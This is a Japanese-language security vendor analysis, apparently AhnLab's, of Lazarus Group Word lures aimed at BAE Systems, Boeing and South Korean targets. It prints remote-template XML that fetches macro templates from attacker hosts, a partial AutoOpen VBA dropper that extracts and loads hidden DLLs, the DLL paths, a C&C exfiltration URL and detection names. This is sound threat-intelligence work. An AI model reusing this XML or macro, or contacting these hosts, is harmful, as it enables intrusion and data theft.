Lazarus グループの防衛産業体を対象とする攻撃が、4月から増加している。攻撃は Microsoft Office Word プログラムのO ffice Open XML タイプの Word 文書ファイルを利用している。(サンプル引用元:国外のTwitter)
- Senior_Design_Engineer.docx – 英国 BAE システムズ(5月収集)
- Boeing_DSS_SE.docx – 米国 Boeing(5月収集)
- US-ROK Relations and Diplomatic Security.docx – 国内 ROK(4月収集)
文書ファイルは共通して外部 External アドレスにアクセスし、追加文書ファイル(*.dotm、Word Macro-Enabled Template)をダウンロードする。ダウンロードされた追加文書ファイルは、特定パターンの VBA マクロコードにより不正な DLL ファイルをシステムに生成および動作する。
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?> <Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”https://www.astedams.it/uploads/frame/61.dotm” TargetMode=”External”/></Relationships>
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?> <Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”https://www.astedams.it/uploads/template/17.dotm” TargetMode=”External”/></Relationships>
<?xml version=”1.0″ encoding=”UTF-8″ standalone=”yes”?>
<Relationships xmlns=”http://schemas.openxmlformats.org/package/2006/relationships”><Relationship Id=”rId1″ Type=”http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate” Target=”
https://od.lk/d/MzBfMjA1Njc0ODdf/pubmaterial.dotm
” TargetMode=”External”/></Relationships>
VBA コードは、AutoOpen() 関数を利用する。実行すると最初に実行した文書ファイルを削除して、「<ファイル名>.doc」の名前で正常な文書ファイルをシステムに作成してユーザーに対して表示すると同時に、不正な DLL ファイルをx64/x86を区分してシステムに生成および実行する。生成に必要なバイナリデータは、UserForm に Base64 でエンコードされている。DLL ファイルのパスは Microsoft パスを偽装する。
- %UserProfile%\AppData\Local\Microsoft\Notice\ws\wsdts.db
- %UserProfile%\AppData\Local\Microsoft\Notice\ws\wsuer.db
- %UserProfile%\AppData\Local\Microsoft\OneNote\onenote.db
以下は VBA コードの一部である。不正なファイルのコードパターンは全体的に同じである。VBA コードを利用して生成した DLL の Export 関数を呼び出して実行する。このとき独特な点は、特定の長さのユニークな数字情報を同時に伝達し、以降 DLL 実行時に有効な引数の有無を確認することである。
| 英国BAEシステムズ | sqlite3_stmt_all(orgDocPath, “S-6-81-3811-75432205-060098-6872”, “61”) |
| 米国Boeing | sqlite3_stmt_all(orgDocPath, “S-6-81-3811-75432205-060098-6872”, “17”) |
| 国内ROK | CoContentInfo(orgDocPath, “S-6-38-4412-76700627-315277-3247”, “18”) |
Private Declare PtrSafe Function sqlite3_stmt_all Lib “wsdts.db” (ByVal lpDocPath As String, ByVal lpPass As String, ByVal lpUID As String) As Long
Private Declare PtrSafe Function LoadLibraryA Lib “kernel32” (ByVal lpLibFileName As String) As LongPtr
…..
Sub AutoOpen()
On Error Resume Next
Application.Visible = False
dllPath = GetDllName()
docPath = GetDocName()
orgDocPath = ActiveDocument.Path & “\” & ActiveDocument.Name
ExtractDll (dllPath)
ExtractDoc (docPath)
LoadLibraryA (dllPath)
a = sqlite3_stmt_all(orgDocPath, “S-6-81-3811-75432205-060098-6872”, “61”)
Dim objDocApp
Set objDocApp = CreateObject(“Word.Application”)
objDocApp.Visible = True
objDocApp.Documents.Open docPath
Application.Quit (wdDoNotSaveChanges)
End Sub
DLL ファイルは SQLite3 関連の関数を利用している。ユーザー情報奪取のための SQLite データベースの構文解析を目的とする。一番最初に拡散した「国内ROK」関連の文書で生成された DLL ファイルはパッキングされていないが、最近収集された「英国BAEシステムズ」関連の文書で生成された DLL ファイルは、UPX でパックされている。以下は呼び出された sqlite3_stmt_all 関数である。システム情報奪取等のための追加スレッドの生成と、他の関数実行のための rundll32.exe プロセスを実行する部分が確認できる。情報収集後は、C&C サーバー(www.astedams.it/newsl/offerte-news.asp等)に POST で情報を送信する。
現在 AhnLab では、このマルウェアを次のような診断名で診断している。
- Downloader/XML.External
- Dropper/VBA.Agent
- W97M/Dropper
- Trojan/Win32.Agent
- Trojan/Win32.Akdoor
- その他多数
Categories:マルウェアの情報